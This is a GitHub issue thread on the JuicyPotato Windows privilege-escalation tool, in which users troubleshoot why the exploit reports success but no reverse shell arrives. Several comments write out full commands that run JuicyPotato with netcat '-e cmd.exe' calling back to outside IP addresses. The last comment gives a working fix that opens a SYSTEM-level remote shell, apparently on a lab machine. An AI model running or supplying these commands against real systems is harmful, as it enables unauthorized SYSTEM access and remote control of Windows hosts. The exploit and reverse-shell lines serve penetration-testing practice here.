search

ohpe / juicy-potato

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
https://ohpe.github.io/juicy-potato/
GNU General Public License v3.0
2.42k stars 466 forks source link

[+] CreateProcessWithTokenW OK but no shell #13

Closed 0xm4ud closed 1 year ago

0xm4ud commented 4 years ago

after everything runs is doesnt executes the file i give ./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}' Testing {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} 1234
......
[+] authresult 0
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

after that nothing happens, ive tried given diferent bat files whatnot.. can anyone point me a better direction !

0xTen commented 4 years ago

you forgot the '-e' in the netcat args string... >> ./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "-e cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}'

secfung commented 2 years ago

Hihi, I got the same issue which I could not get the shell.

Screenshot 2022-01-27 at 23 44 15

1.exe = juicypotato rev.bat: image

I tried below:

  1. Different CLSID
  2. nc.exe or nc64.exe
  3. Try different netcat destination port
  4. Directly execute rev.bat and it could get the shell

image

image

Already spent 3 hours to test and search but no luck. Any clue on this? thank you!

yichunhuang commented 2 years ago

Having the same issue as @secfung, did you manage to solve it?

daMatz commented 1 year ago

I have the same issue as @secfung and @yichunhuang.

Any solutions in the meantime? Did you guys figure out anything?

michaelkhchan commented 6 months ago

I know this issue is closed, but I just want to share what I found so far:

So I was facing a similar issue when I was playing with a vulnerable box, where I also get the "CreateProcessWithTokenW OK" respond.

JuicyPotato.exe -p C:\Temp\nc.exe -a "-e C:\Windows\System32\cmd.exe 10.10.14.16 5555" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}

This returns:

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

However, no shell was returned to my Netcat listener on port 5555.

I then attempted to troubleshoot by calling the cmd to create a text file instead:

JuicyPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Temp\test.txt" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}

And guess what - it works! The test.txt returns nt authority\system, which means that the exploit actually worked and the issue is most likely on nc.exe.

After another 2 hours of experimenting, I finally got the reverse shell to work by calling CMD to call nc.exe:

JuicyPotato.exe -p C:\Windows\System32\cmd.exe -a "C:\Temp\nc.exe -e cmd.exe 10.10.14.16 5555" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}

And this time it successfully connected to my netcat listener.

To conclude - My guess is it may be something related to JuicyPotato not able to directly execute the Netcat.exe, and it can only execute cmd.exe to then call another application with SYSTEM privilege. Hope that helps after 4 years!